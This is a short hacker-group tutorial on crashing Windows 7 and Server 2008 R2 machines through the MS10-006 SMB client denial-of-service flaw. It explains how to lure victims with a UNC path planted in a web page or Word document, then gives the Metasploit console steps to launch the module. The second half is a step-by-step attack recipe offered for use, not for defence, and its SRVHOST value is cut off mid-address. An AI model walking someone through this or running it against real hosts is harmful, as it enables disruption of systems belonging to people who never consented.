DOS attack on windows-7 using backtrack
Dos-attack-on-windows-7 |
This module exploits a denial of service flaw in the Microsoft
Windows SMB client on Windows 7 and Windows Server 2008 R2. To
trigger this bug, run this module as a service and forces a
vulnerabile client to access the IP of this system as an SMB server.
This can be accomplished by embedding a UNC path
(\HOST\share\something) into a web page if the target is using
Internet Explorer, or a Word document otherwise.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0017
http://www.osvdb.org/62244
http://www.microsoft.com/technet/security/bulletin/MS10-006.mspx
Exploit name
ms10_006_negotiate_response_loop
msf > search dos
auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
- msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
- msf auxiliary(ms10_006_negotiate_response_loop) > show options
- msf auxiliary(ms10_006_negotiate_response_loop) > set SRVHOST 192.168.1.
- msf auxiliary(ms10_006_negotiate_response_loop) > exploit
© HaCkRhInO-TeaM ! 2014
R0oTx:Sahil_Rai